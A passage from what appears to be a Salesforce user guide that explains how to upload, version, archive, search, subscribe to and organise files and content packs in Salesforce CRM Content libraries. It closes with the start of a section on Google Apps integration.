the Tags field. As you type a tag, Salesforce CRM Content autosuggests tags based on your My Recent Tags list and
the Popular Tags section on the Libraries tab. The My Recent Tags list on the Contribute window shows the 20 tags
you have used most recently. Click a tag to add it to the Tags field automatically.

• If your administrator assigned the guided tagging rule, you can choose from the list of suggested tags or enter a new
tag. Click a suggested tag to add it to the Tags field automatically.

• If your administrator assigned the restricted tagging rule, you must choose from the list of suggested tags. When you
select a tag it turns green.

• You can't change or delete tag names. You can remove tags from a document, but that doesn't delete the tag.
• Tags are case insensitive. You can't have two tags with the same name even if they use different upper and lowercase

letters. The case of the original tag is always used.

8. If multiple content types are available, choose one from the drop-down list. The content type determines which custom
fields appear for you to categorize and define your content.

9. After completing the custom fields, click Publish or Save.

See Also:
Managing Libraries

Updating Content Versions
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Add Content checked in your library permission definitionTo add a new version:

Clicking a file name on any Salesforce CRM Content tab opens the content details page.

Publishing a New Version

To publish a new version of the file and update its properties:

1. Click Edit > Upload New Version. This option does not appear for Web links, content packs, or Google docs.

To add or remove files from a content pack, see Creating and Modifying Content Packs in Salesforce CRM Content on
page 2443.

2. Click Browse to find and select the updated file.
3. As needed, update the Title and Description fields.
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4. Fill out the Reason for change field. This text is included on the email notifications sent to subscribers and the version
list located on the content details page.

5. To publish the content on behalf of another author, choose that author from the drop-down list.
6. Tag your content. Your tagging permission depends on the tagging rule assigned to the library:

• If the library does not have a tagging rule or if your administrator assigned the open tagging rule, you can enter tags in
the Tags field. As you type a tag, Salesforce CRM Content autosuggests tags based on your My Recent Tags list and
the Popular Tags section on the Libraries tab. The My Recent Tags list on the Contribute window shows the 20 tags
you have used most recently. Click a tag to add it to the Tags field automatically.

• If your administrator assigned the guided tagging rule, you can choose from the list of suggested tags or enter a new
tag. Click a suggested tag to add it to the Tags field automatically.

• If your administrator assigned the restricted tagging rule, you must choose from the list of suggested tags. When you
select a tag it turns green.

• You can't change or delete tag names. You can remove tags from a document, but that doesn't delete the tag.
• Tags are case insensitive. You can't have two tags with the same name even if they use different upper and lowercase

letters. The case of the original tag is always used.

7. Update any custom fields as needed.
8. Click Publish.

Notes on Content Versions

Consider the following information when creating or modifying a new version:

• You cannot edit a file within Salesforce CRM Content. To edit a file, download it from Salesforce CRM Content to your
computer, make your changes, then upload the updated version using the Upload New Version button.

• The Versions subtab on the content details page lists all content versions. The Recent Activity list on the Libraries tab
also notifies users of new content versions.

• Contact Manager, Group, Professional, Enterprise, and Unlimited Edition customers can publish a maximum of 5,000
new versions per 24–hour period. Developer Edition and trial users can publish a maximum of 2,500 new versions per
24–hour period.

See Also:
Uploading and Publishing Content
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Deleting, Archiving, and Restoring Content
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Archive Content checked in your library permission
definition

To archive and restore any content in the library:

Add Content checked in your library permission definitionTo archive and restore content that you published:

Delete Content checked in your library permission
definition

To delete content:

Salesforce CRM Content offers two methods for removing content: archiving and deleting. Archiving a piece of content
removes it from its library but does not permanently delete it from Salesforce CRM Content. Once archived, content cannot
be downloaded and it does not appear in search results, but you can locate and restore it if necessary. Deleted content, however,
is permanently deleted from Salesforce CRM Content when the Recycle Bin is emptied.

Note:  If you delete a content pack, you do not delete the individual files within the pack; only the pack (container)
is deleted. Files that are included in a content pack or content delivery cannot be deleted until the pack or delivery is
deleted.

To archive or delete content:

1. Click the file name on the Libraries, Content, or Subscriptions tabs.
2. On the content details page, click Archive Content or Delete Content.

Note:

• Authors can always archive and restore their own content. Authors do not require the Archive Content
library permission option.

• If a file is in Salesforce CRM Content and also posted in Chatter, archiving it doesn't remove the Chatter
post.

• Deleting a Chatter file from the content details page deletes the file from Salesforce CRM Content and from
Chatter.

To restore archived content, open the content details page and click Restore Content. You can use any of the following
methods to open the content details page for an archived piece of content:

• Follow a bookmark to the archived content.

• In the Libraries tab, click a library name to open the library details page. Click the View Archived Content link to see a
list of archived content on the Content tab. The View Archived Content link only displays if you have the Archive
Content, Add Content, or Manage Libraries privileges in your library permission. If you have the Archive
Content or Manage Libraries  privileges, you will see a list of all archived content in the library, regardless of author.
If you do not have those privileges but have the Add Content privilege, you will only see archived content that you
authored and archived. Click the content you want to restore to open the content details page.
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To restore deleted content, click on the Recycle Bin link in any tab. Select the content and click Undelete.

Note:  Archived and deleted files are automatically removed from subscription lists. Subscribers are not notified when
content is archived or deleted.

See Also:
Deleting a File from the File Detail Page

Creating and Modifying Content Packs in Salesforce CRM
Content

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Manage Libraries checked in your library permission
definition

OR

Add Content checked in your library permission definition

To create or modify content packs in Salesforce CRM
Content:

A content pack is a collection of related documents or files that are stored as a group in Salesforce CRM Content. For example,
you may want to create a content pack with a product list, price quote, and contract to send to a particular customer. Any file
in Salesforce CRM Content can be added to a content pack, from traditional business documents such as Microsoft® PowerPoint
presentations and Adobe® PDF files, to audio files, video files, and Google docs. Using email or instant messaging, you can
distribute the content pack to colleagues in your organization or leads and contacts outside your organization. The recipient
of a content delivery can click a single URL to open a preview player with which he or she can preview and download the
content. You can then view tracking information to see how often the content pack was viewed and which documents were
downloaded. .

Note:  Content packs support all files types; however, the preview player launched by the content-delivery URL
displays only PowerPoint, Word, Excel, and PDF files. The preview player does not display copy-protected PDFs.
Also, working with content packs requires Adobe Flash® Player, version 9.0.11.5 or higher. If you do not have Flash
installed, Salesforce provides a link to Adobe's website where you can download Flash for free.

To work with content packs:

1. Depending on whether you want to create, customize, or modify a content pack, use one of the following options:

Note:  The following options are only available if Enable content pack creation is selected in Setup on
the Customize > Salesforce CRM Content > Settings page. If content pack creation is disabled after packs have
been created, Salesforce does not delete existing packs but they cannot be customized or modified.

• To create a new content pack, click the Libraries tab and then choose Create New > Content Pack.
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• To create a new content pack by copying an existing pack and adding, removing, or reordering files, open the content
details page for the pack and click Clone & Customize.

• To update a content pack and publish a new version, open the content details page for the pack and click Edit > Edit
Content Pack.

2. Click Search files to display all the content in your libraries. To refine your results, select a specific library to search or
enter a search term in the text box.

In addition to files and documents, search results also list content packs.

3. Drag the desired content from the search results into the assembly section in the lower half of the window. The following
options help you assemble your content pack:

• In the search results, click a document to preview it in the lower half of the window. Choose Add to Content Pack or
Hide preview as needed.

• In the search results, hover over a document and click the folder icon ( ) to view the content packs that use the
document.

• In the search results, hover over a content pack and click the folder icon ( ) to view all the documents in the pack.

• In the assembly section, hover over a document and click the garbage can icon ( ) to remove that document from the
pack you are assembling.

• Click Clear at any time to revert your changes; click Cancel to return to the Libraries tab.

Note:  The maximum number of files that can be included in a content pack is 50.

4. When you are done assembling or modifying your content pack, click Save and assign or change the content pack's name.
5. In the Save or Publish Content dialog:

a. Select a library. If you do not want the content pack to be visible to other users in your organization, for example if
your work is still in progress, choose Save in my personal library.

b. Optionally, add or modify the content pack's description.
c. Optionally, choose a language. The Language drop-down list is displayed if multi-language support is enabled. If you

do not choose a language, Salesforce CRM Content associates your content with your personal language setting. If
users restrict their content searches to a particular language, only content associated with that language is displayed in
the search result set.

d. If you are modifying the content pack, complete the Reason for Change field.
e. To publish the content on behalf of another author, choose that author from the drop-down list.
f. Tag your content. Your tagging permission depends on the tagging rule assigned to the library:

• If the library does not have a tagging rule or if your administrator assigned the open tagging rule, you can enter tags
in the Tags field. As you type a tag, Salesforce CRM Content autosuggests tags based on your My Recent Tags
list and the Popular Tags section on the Libraries tab. The My Recent Tags list on the Contribute window shows
the 20 tags you have used most recently. Click a tag to add it to the Tags field automatically.

• If your administrator assigned the guided tagging rule, you can choose from the list of suggested tags or enter a new
tag. Click a suggested tag to add it to the Tags field automatically.

• If your administrator assigned the restricted tagging rule, you must choose from the list of suggested tags. When
you select a tag it turns green.

• You can't change or delete tag names. You can remove tags from a document, but that doesn't delete the tag.
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• Tags are case insensitive. You can't have two tags with the same name even if they use different upper and lowercase
letters. The case of the original tag is always used.

g. If multiple content types are available, choose one from the drop-down list. The content type determines which custom
fields appear for you to categorize and define your content.

h. Click Publish. You can then view the content details page, return to the Libraries tab, or publish another file.

See Also:
Viewing and Editing Content Deliveries

FIND CONTENT

Finding Salesforce CRM Content
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions

Salesforce CRM Content User checked in your personal
information

AND

Member of the library

To access Salesforce CRM Content:

If your organization has Salesforce CRM Content enabled, you can take advantage of Salesforce CRM Content functionality
on detail pages for leads, accounts, contacts, opportunities, products, cases, or custom objects. The Related Content related
list allows you to search for files, content packs, Web links, or Google docs and attach them to the record. When you attach
a file, the latest version will be available for the life of the record unless the file is removed.

From the Related Content related list, you can:

• Click the content's title to view the content details page where you can perform several tasks, such as commenting and
voting on content, downloading files, opening Web pages and Google docs, and subscribing to content, authors, tags, or
libraries. For more information, see Viewing and Editing Content Details on page 2449.

• Click Del next to a piece of content to remove it from the record. This does not delete the content from the Salesforce
CRM Content library.

• If content deliveries are enabled in your organization, click Deliver Content  to create a content delivery. A content delivery
allows you to easily convert documents such as Microsoft® PowerPoint and Word files into an optimized web-based version
for easy online viewing. Once you create your delivery, you can send its encrypted URL to any recipient, such as leads,
customers, partners, and colleagues, and then track how often the content is viewed or downloaded. In addition to tracking,
content deliveries provide several benefits over sending files as attachments, such as giving you control over how long the
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delivery is available to viewers and whether a viewer can download a file or see it online only. For more information, see
Creating Content Deliveries on page 2473.

• Search for related content:

1. Click Find Content or Search All. In both cases, Salesforce CRM Content searches within the libraries that you have
access to. If you click Search All, the search results display all the content in your libraries. For the Find Content search,
your search results contain content that is relevant to the record; Salesforce CRM Content searches for content with
text or attributes that match the following fields:

◊ On an opportunity, the Opportunity Name, Account Name, and all competitors and products.
◊ On an account, the Account Name and Industry.
◊ On a case, the Case Reason, Subject, Account Name, and Industry.
◊ On a lead, the Name, Company, Industry, and Title.

Note:  On a custom object, clicking Find Content returns search results that contain the full custom object
name in the document's text or attributes. If no content meets this criterion, the search results will be empty
and a Search All search should be used instead.

2. On the search results page, filter your results as needed by entering search terms or selecting filter criteria from the
sidebar.

3. Click Attach for any file that you want to attach to the record.
4. Click the Back link to return to the detail page.

Searching for Content
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Salesforce CRM Content User checked in your personal
information

AND

Member of the library

To search Salesforce CRM Content:

Clicking the Content tab displays files, content packs, Web links, and Google docs published in your Salesforce CRM Content
libraries. If Chatter is enabled, and your administrator has enabled the setting to show Chatter files in Salesforce CRM Content,
files posted to Chatter groups and other Chatter files that aren't private or privately shared, are also displayed on the Content
tab. The top twenty most recently modified items are listed by default. You can filter the list using the Filter Your Results
sidebar.

To search for specific content:

1. From the Search drop-down list, restrict your search to a specific library or choose to search in all libraries. If available,
restrict your search to just Chatter files or just files in Chatter groups you're a member of.
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Tip:  To display all the locations where the content appears, click Display Options and select Display Locations.
The locations are listed under each title.

2. Enter your search term(s) and click Go!. Salesforce CRM Content performs a full-text search of the following document
types: rich text format (RTF), UTF-8 encoded TXT, HTML, XML, Adobe® PDF, and Microsoft® Office 97 through
Microsoft Office 2007 Word, Excel, and PowerPoint files.

3. If your administrator has enabled multi-language support, you can restrict your search to a specific language. By default,
Salesforce CRM Content searches all the content in your libraries that is published in your default user language. Searching
in all languages also searches the titles, author names, tags, file extensions, and custom fields of content in all languages.

Note:  Searching in all languages does not search the text or description of documents that were published in
languages other than your default user language.

4. Optionally, in the Filter Your Results sidebar, filter your search results by file format, featured content, author, tag, libraries,
language, custom field, or Chatter group (if available). The number in parentheses next to each filter type shows you how
many matching files, content packs, Web links, and Google docs are in the search results.

The Content tab provides several options:

• Click Display Options to customize your view by adding sortable columns for various content criteria (such as Size and
Publication Date), or choosing to display descriptions, tags and locations. Display Locations shows the libraries and
Chatter groups where the content appears. My Libraries: none or My Chatter Groups: none means that the file is a
Chatter file and is not part of any libraries or Chatter groups. The “smart bar” graphic for downloads, comments, ratings,
and subscribers allows you to compare files, content packs, Google docs, and links within a search result set.

Note: Chatter groups are only included in Display Locations if Chatter is enabled, and your administrator has
enabled the setting to show Chatter files in Salesforce CRM Content.

• Select one or more files and click Download to create a zip file with your selected content. Web links and Google docs
cannot be included in zip files.

• Hover over a file icon to see a snapshot of information about the specific file, content pack, Google doc, or Web link and
options such as subscribing, voting, and downloading.

• Click the subscription icon next to the file name to toggle a subscription on or off. For more information, see Viewing and
Editing Content Subscriptions on page 2452.

• Click the file name to view the content details page. The content details page provides all the available information about
a file, content pack, Google doc, or link. For more information, see Viewing and Editing Content Details on page 2449.

Search supports several file types and has limits on file sizes. If a file exceeds the maximum size, the text within the file isn't
searched, but the file's author name, tags, file extension, and custom fields are.

Maximum File Size for Text Within the
File to be Searchable

File ExtensionsFile Type

5 MB.htm, .html, .xhtmlHTML

25 MB.pdfPDF

25 MB.ppt, .pptx, .pptmPPT

5 MB.rtfRTF
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Maximum File Size for Text Within the
File to be Searchable

File ExtensionsFile Type

5 MB.c, .cpp, .css, .csv, .ini, .java,
.log, .sql, .txt

Text

25 MB.doc, .docx, .docmWord

5 MB.xmlXML

5 MB.xls, .xlsx, .xlsmXLS

See Also:
Searching for Files
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Viewing and Editing Content Details
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Member of the libraryTo preview and download shared content:

NoneTo preview and download private content:

Add Content checked in your library permission definitionTo upload a new version:

Archive Content checked in your library permission
definition

OR

Author of the content

To archive and restore content:

Delete Content checked in your library permission
definition

To permanently delete content:

Modify Comments checked in your library permission
definition

To view and edit comments:

Delete Comments checked in your library permission
definition

To delete comments:

Tag Content checked in your library permission definitionTo tag content:

Feature Content checked in your library permission
definition

To mark content as featured:

Deliver Content checked in your library permission
definition

To deliver content from a shared library:

Deliver Uploaded Files and Personal Content
checked in your library permission definition

To deliver content from a personal library:

Post Content to Chatter Feeds checked in your library
permission definition

To post content from a library to a Chatter feed:

Clicking a file name on the Libraries, Content, or Subscriptions tabs opens the content details page, which is a central access
point to preview content and gather information about a particular file, Web link, content pack, or Google doc in Salesforce
CRM Content. Starting with the Summer '10 release, if Chatter is enabled for your organization, files posted to Chatter are
also listed.

The Preview tab displays if your file is one of the following types:

• Microsoft® Office 97 through Microsoft Office 2007 Word, Excel, and PowerPoint. Some Microsoft Office 2007 features
don't display correctly in previews.

• Adobe® PDF. Copy-protected PDFs can't be previewed.

• JPG, BMP, GIF, and PNG
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The following options are available on the content details page depending on the type of content you are viewing, your library
permissions, and whether the content is in a public or private library, or from Chatter:

• Click the thumbs up or thumbs down icon to vote for the file, Web link, content pack, or Google doc. To change your
vote, click the opposite icon. After you cast a vote, the Recent Activity list on the Libraries tab indicates whether you like
or dislike the content.

• Click Deliver Content to create a content delivery. Click Deliver Content > Show Content Deliveries to view a list of
deliveries associated with the content.

• For Web links or Google docs, click the Open button to open the Web page in a separate window. For files, click the
Download button to open or save the file.

• Click Subscribe or Subscribed to toggle your subscription on or off.

• For files, click the Content Packs subtab to see which content packs include this file.

◊ Library administrators can click Remove from all to remove the file from all content packs that include the file.

◊ Click the name of the content pack that includes the file to view the details of that content pack.

• For content packs, click Clone & Customize to create a new pack by adding or removing files and slides. Salesforce CRM
Content saves or publishes your customized pack as new content, not a version of the pack you copied.

• Click Edit > Edit Content Details to modify standard and custom fields.

• Click Edit > Edit Content Pack to create a new version of a content pack by adding or removing files.

• For files, click Edit > Upload New Version to replace the file with a new version. The version option is not available for
Web links, content packs, or Google docs.

Note:  If the Add New Version button is grayed out, your organization has exceeded its file storage allowance
and new content cannot be uploaded.

• Click Edit > Archive Content to remove the file, Web link, content pack, or Google doc from the library. Authors can
archive and restore their own content regardless of library permissions.If a file is in Salesforce CRM Content and also
posted in Chatter, archiving it doesn't remove the Chatter post.

• Click Edit > Delete Content to delete the file, Web link, content pack, or Google doc from Salesforce CRM Content by
moving it to the Recycle Bin. Authors can delete and undelete their own content regardless of library permissions. Deleting
a Google doc removes the doc's association with Salesforce CRM Content but does not delete the doc in Google Apps.
You cannot delete a file that is included in a content pack or content delivery. Deleting a Chatter file from the content
details page deletes the file from Salesforce CRM Content and from Chatter.

• Click Edit > Library Actions and choose Move to Another Library to move the content to a different managing (or
“home”) library. Choose Share to Another Library to share content into additional libraries without changing the managing
library. Sharing or linking content to other libraries enables members of those libraries to find your content. If the managing
library and shared library have different tagging rules, the most restrictive tagging rule applies. If you want to remove
content from a library where the content is shared, click Remove from Libraries. This option does not remove content
from its managing library

• Click the Comments subtab to view, add, edit, or delete comments.

• Click the Versions subtab to view a list of all file versions and the reason-for-change statements provided by the authors.

• Click the Downloads subtab to view a list of all Salesforce CRM Content users who have downloaded the file. Download
data is not available for Web links or Google docs.

• Click the Subscribers subtab to view a list of all Salesforce CRM Content users subscribed to the file, Web link, or Google
doc. To subscribe to an author, click the drop-down button next to the author's name. To subscribe to a library, click the
drop-down button next to the library name.
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• Click a tag name to view all the content associated with that tag. Click the arrow next to the tag to remove the tag or to
subscribe to all content with that tag.

• To add a new tag, enter a tag name in the Add Tags field and click Save. As you type a tag, Salesforce CRM Content
autosuggests tags based on the tags in your My Recent Tags list in the Save or Publish window and the Popular Tags
section on the Libraries tab.

Note:  If your administrator applied a library tagging rule, you may not be able to enter new tags. If the guided
tagging rule is applied, you can click Add Tags and choose from the list of suggested tags or enter new tags. If
the restricted library tagging rule is applied, you can click Add Tags and choose from the list of suggested tags,
but you cannot enter your own tags.

• Click the author's name to see a list of the author's published content. Click the arrow next to the author's name and choose
Subscribe to Author to subscribe to all content published by that author.

• Click Feature or Don't Feature to toggle the “feature” designation on or off. Featured content receives a higher priority
than similar content in search results; for example, if 100 files contain the search criteria term sales asset, any featured
files with that term will appear at the top of the search results list. Featured content is also listed on the library overview
and library detail pages for quick access.

• Click a library name to view details about the library. Click the arrow next to the library name and choose Subscribe to
Library to subscribe to all content in the library or Show Library Content to view a list of all files, content packs, Web
links, and Google docs published to the library.

Using the Content Related List
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Salesforce CRM Content User checked in your personal
information

To access Salesforce CRM Content:

The Content related list on a record detail page includes links to all of the content that has been associated with that record
in Salesforce CRM Content. Click the file name to open the content details page.

Only Salesforce CRM Content users who are members of the library where the content was published can see the published
file in the Content related list. For example, if you select the “Big Deal” opportunity when publishing BigDealStrategy.doc
into the Sales Collateral library, the Content related list on the “Big Deal” opportunity includes a link to
BigDealStrategy.doc only for members of the Sales Collateral library. Users who are not members of that library do not
see the link.

You can use the Related Content related list to access Salesforce CRM Content from leads, accounts, contacts, opportunities,
products, cases, or custom objects. For more information, see Finding Salesforce CRM Content on page 2445.

See Also:
Salesforce CRM Content Overview
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Viewing and Editing Content Subscriptions
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Salesforce CRM Content User checked in your personal
information

AND

Member of the library

To subscribe to content:

Clicking the Subscriptions tab displays the Subscriptions home page, where you can view your Salesforce CRM Content
subscriptions and toggle them off or on.

Note:  To subscribe to a file, content pack, Web link, or Google doc, view its content details page and click Not
Subscribed. From the content details page you can also subscribe to a tag, author, or library by using the drop-down
menus next to the tag, author, or library name.

On the Subscriptions tab, click the Content, Tags, Authors, or Libraries subtabs to view your subscriptions. Depending on
your notification settings, you are notified of changes to your subscribed content via real-time emails or a once-daily email.

Tip:  To configure your notification settings, go to your personal information page, click Edit, and select Receive
Salesforce CRM Content email alerts. If you want to receive a once-daily summary rather than real-time
email alerts, also select Receive Salesforce CRM Content emails as daily digest.

Subscriptions generate the following notifications:

• If you subscribe to a file, you are notified when a viewer adds comments to the file or when a new version of the file is
published. If you subscribe to a Web link or Google doc, you are notified when comments are added but not when the
link is changed or the doc is edited.

• If you subscribe to a content pack you are notified when a new version of the pack is published. Unless you are subscribed
to the individual files within a content pack, you are not notified when new versions of the files are published.

• If you subscribe to a tag, you are notified of any newly published content that is associated to the subscribed tag. To be
notified that new versions of the tagged content are available, subscribe to the content.

• If you subscribe to an author, you are notified when the author publishes new content. To be notified that new versions
of an author's content are available, subscribe to the content.

• If you subscribe to a library, you are notified when new content is added to the library, including existing content that has
been newly linked to your subscribed library. To be notified that new versions of the library content are available, subscribe
to the content.

See Also:
Updating Content Versions
Following Files
Uploading a New Version of a File
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Viewing and Editing Libraries
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Salesforce CRM Content”

OR

Manage Libraries checked in your library permission
definition

To edit a library:

“Manage Salesforce CRM Content”

OR

Manage Libraries checked in your library permission
definition

To add or remove library members:

Once you have located a Salesforce CRM Content library in the My Libraries area of the Libraries tab home page or on a
content details page, click the library name to display detailed information. For details about the publishing options at the top
of the page, see Uploading and Publishing Content on page 2436.

From the library title area, you can click the following quick links:

• Browse to view search results showing all the content in the library.

• Edit to change the library name or description.

• Delete to delete an empty library. If you want to delete a library that contains content, you must first move the content to
another library or delete it and empty the Recycle Bin.

Note:  If your Recycle Bin is empty and you are unable to delete the library, another user's Recycle Bin may contain
deleted content from the same library. A library cannot be deleted until all its content is permanently deleted or
moved to another library.

• Edit Members to add or remove library members or change their library permission.

• Tagging Rules to change the tagging method permitted in the library.

• Content Types to restrict the content types available to library contributors.

• View Archived Content to view a list of archived content in the library. If you do not have the Archive Content or
Manage Libraries privilege in your library permission, the archived content list only contains content that you authored
and archived, not content that other authors archived.

The library detail page contains the following sections:

Members

This section lists all the Salesforce CRM Content users who are members of the library. To limit the member list, enter
a username and click Filter. You can filter by the beginning of a username but not the last name.

To add new members to the library:
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1. Click Add Members.
2. If you do not immediately see the member you want to add, enter keywords in the search box and click Find.
3. Select members from the Available Members box. Members can include individual Salesforce CRM Content users

or public groups containing Salesforce CRM Content users.

Tip:  If you have a large number of Salesforce CRM Content users, create a public group and add the group
to a library rather than adding users to the library individually.

4. Click Add to add the members to the library.
5. Click Next.
6. Select a library permission for each user or public group and click Save.

To remove a member from the library, click Remove. To change a member's library permission, click Edit and choose
a new library permission from the drop-down list.

Featured Content

This section lists the five pieces of content in the library most recently designated as “featured.” If no content has been
featured, this section does not display. Featured content receives a higher priority than similar content in search results;
for example, if 100 files contain the search criteria term sales asset, any featured files with that term will appear at
the top of the search results list. To see all featured content, click Show All. To toggle the feature status on or off, go
to its content details page.

Top Content

This section includes lists that summarize content activity in your library. Within a list, click a file icon to download the
content or click the title to open the associated content details page. In the Top Content section you can choose from
the following categories:
• Publication Date—This content is sorted in descending order according to the most recent publication date. Choose

the number of records you want to view from the accompanying drop-down list, or click the Show All button to list
all the published files, Web links, and Google docs.

• Num Downloads—This content is sorted in descending order according to the highest number of downloads. The
bar graphic indicates how one record compares to another. Choose the number of records you want to view from the
accompanying drop-down list, or click the Show All button to list all the downloaded content.

• Rating—This content is sorted in descending order according to the highest number of thumbs-up votes. Green
and red in the bar graphic represent positive and negative votes, respectively. Choose the number of records you want
to view from the accompanying drop-down list, or click the Show All button to list all the content with votes.

• Num Comments—This content is sorted in descending order according to the highest number of viewer comments.
The bar graphic indicates how one record compares to another. Choose the number of records you want to view
from the accompanying drop-down list, or click the Show All button to list all the content with associated comments.

Popular Tags

This “tag cloud” shows you how the content in your library has been labeled. Tags are descriptive terms assigned during
upload or revision that help classify and organize content. Click a tag name to view search results containing all the files,
Web links, and Google docs with that tag. The tag names increase in size within the tag cloud according to popularity,
meaning that the largest tags have been assigned to the most content. You can choose to sort the tags alphabetically or
by popularity. The tag cloud contains the 30 most popular tags.
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Recent Activity

This section is a snapshot of activity within your library. It shows the most recent files, Web links, and Google docs to
receive comments, votes, or subscriptions. Featured content and newly published content are also included, but new
versions of existing content, archived content, and deleted content do not appear in the Recent Activity section. Use the
Older and Newer buttons to scroll through records. The Recent Activity section contains a maximum of 100 records.

Most Active Contributors

This section shows the authors who have uploaded content into your library most frequently. The names increase in size
according to activity, so the largest names are the authors who have contributed the most content.

See Also:
Managing Libraries
Updating Content Versions

Managing Libraries
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Salesforce CRM Content”

OR

“Create Libraries”

To create libraries:

“Manage Salesforce CRM Content”

OR

Manage Libraries checked in your library permission
definition

To edit libraries:

Clicking the Libraries tab opens the libraries home page. On the home page you can access your personal library, create new
libraries in Salesforce CRM Content, choose a specific library to view or edit, and analyze library usage and activity. For details
about the publishing options at the top of the page, see Uploading and Publishing Content on page 2436. The libraries home
page has two tabs: Shared Content, which provides information about shared libraries, and My Personal Content, which
contains information about your personal library.

Shared Content

The Shared Content tab on the libraries home page contains the following sections:

My Libraries
This section lists all the libraries to which you have access. Click a library name to view details about that library or click
Browse to view a list of all the content in the library. Click the New button to create new libraries, add users to a library,
or assign library permissions to users.
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Featured Content
This section lists the five pieces of content in your libraries most recently designed as “featured.” Featured content receives
a higher priority than similar content in search results; for example, if 100 files contain the search criteria term sales
asset, any featured files with that term will appear at the top of the search results list. To see all featured content, click
Show All. To toggle a piece of content's feature status on or off, go to its content details page.

Top Content
This section includes lists that summarize content activity across all your libraries. Each list sorts content according to
specific criteria. Within a list, click a file icon to download content or click a title to open the associated content details
page. In the Top Content section you can choose from the following categories:
• Publication Date—This content is sorted in descending order according to the most recent publication date. Choose

the number of records you want to view from the accompanying drop-down list, or click the Show All button to list
all the published files, Web links, and Google docs.

• Num Downloads—This content is sorted in descending order according to the highest number of downloads. The
bar graphic indicates how one record compares to another. Choose the number of records you want to view from the
accompanying drop-down list, or click the Show All button to list all the downloaded content.

• Rating—This content is sorted in descending order according to the highest number of thumbs-up votes. Green
and red in the bar graphic represent positive and negative votes, respectively. Choose the number of records you want
to view from the accompanying drop-down list, or click the Show All button to list all the content with votes.

• Num Comments—This content is sorted in descending order according to the highest number of viewer comments.
The bar graphic indicates how one record compares to another. Choose the number of records you want to view
from the accompanying drop-down list, or click the Show All button to list all the content with associated comments.

Popular Tags
This section, commonly referred to as a “tag cloud,” shows you how the content in your libraries has been labeled. Tags
are descriptive terms assigned during upload or revision that help classify and organize content. Click a tag name to view
search results containing all the files, Web links, and Google docs with that tag. The tag names increase in size within
the tag cloud according to popularity, meaning that the largest tags have been assigned to the most content. You can
choose to sort the tags alphabetically or by popularity. The tag cloud contains the 30 most popular tags.

Recent Activity
This section is a snapshot of activity within your libraries. It shows the most recent files, Web links, and Google docs
to receive comments, votes, or subscriptions. Featured content and newly published content are also included, but new
versions of existing content, archived content, and deleted content do not appear in the Recent Activity section. Use the
Older and Newer buttons to scroll through records. The Recent Activity section contains a maximum of 100 records.

Most Active Contributors
This section shows the authors who have published content into your libraries most frequently. The names increase in
size according to activity, so the largest names are the authors who have contributed the most content.

My Personal Content

The My Personal Content tab on the libraries home page is your private library. When you upload or create content and do
not select a public library, your content is stored in your private library. You can publish content to a public library at any time
or leave content in your private library indefinitely. Content in your private library can be assembled in content packs. It can
also be sent to leads and contacts outside your organization using the content delivery feature. See Setting up Content Deliveries
on page 2520 for more information. The My Personal Content tab has the following sections:

Personal Library
If you choose the Save to my personal library option when publishing a file, Web link, content pack, or Google doc,
your content is saved here. You can publish or delete files from this list or click the file's name to view its content details
page. The following options that are available on the content details page for shared content are not available for
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personal-library content: tagging, rating, subscribing, tracking downloads, tracking subscriptions, or using custom fields.
If you publish a file from the Personal Library list and click Cancel during the publishing process, your file is deleted.

Upload Interrupted
If an error occurs when you are uploading a new file, for example your browser crashes or your session times out, the file
you were uploading is saved here. Click Publish to publish the file to a public library or save it to your personal library.
If you click Cancel on the Save or Publish Content dialog, your file will be deleted.

Revision Upload Interrupted
If an error occurs when you are uploading a new version of a file, the file you were uploading is saved here. Users can
continue to access the original version. Click Publish to publish the file to a public library or save it to your personal
library. If you click Cancel on the Save or Publish Content dialog, your file will be deleted.

See Also:
Setting up Content Deliveries
Creating and Modifying Content Packs in Salesforce CRM Content

GOOGLE APPS

Google Apps Overview
Available in: All Editions except Database.com

Google Apps™ is a suite of on-demand communication and collaboration services hosted by Google and designed for business
users. Salesforce integrates key Google Apps services and provides several AppExchange apps that enhance and customize
Google-related functionality.

The following services for Google Apps are integrated with Salesforce and require a simple activation by a Salesforce
administrator:

Add Google Docs to Salesforce

Google Docs™ allows you to create on-demand documents, spreadsheets, and presentations, edit them in your browser,
and work together in real time with other collaborators. When the Add Google Docs to Salesforce service is activated,
you can:
• Use the Google Docs, Notes, & Attachments or Google Docs & Attachments related list on any Salesforce record

to create, edit, or view Google docs and associate them to a record.
• Share a Google doc with any Google Apps user in your organization.

• Associate Google docs with Salesforce records even when you are not working in Salesforce by using the Add Google
Doc to Salesforce browser button.

• Add Google docs to Salesforce CRM Content, which allows you to manage all types of content in a centralized
location.
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Gmail to Salesforce

Gmail™ is a Web-based email application that operates on all standard browsers and can be used with your company's
domain. Use Gmail to Salesforce to automatically log emails you send from your Gmail account as activities on lead and
contact records in Salesforce.

Gmail Buttons and Links

Gmail Buttons and Links adds Gmail links next to email fields on all records and adds Compose Gmail buttons in
Activity History related lists on leads and contacts. When you click a Gmail link or the Compose Gmail button, Salesforce
automatically logs you into your Gmail account and automatically populates the To field. If Gmail to Salesforce is
activated, Salesforce also populates the BCC field with your Email to Salesforce address.

Installing the Add Google Doc to Salesforce Browser Button
Available in: All Editions except Database.com

A browser button is an applet, or small computer application, that provides one-click functionality similar to a bookmark. The
Add Google Doc to Salesforce browser button allows you to associate a Google doc with several Salesforce records at once,
even when you are not working in Salesforce. To use this browser button, your administrator must enable the Add Google
Doc to Salesforce and you must install the browser button in your browser.

You can access the Add Google Doc to Salesforce browser button on the Contribute tab in Salesforce CRM Content or on
a record detail page:

1. Display any record in Salesforce that has a Google Docs, Notes, & Attachments or Google Docs & Attachments related
list on the record detail page.

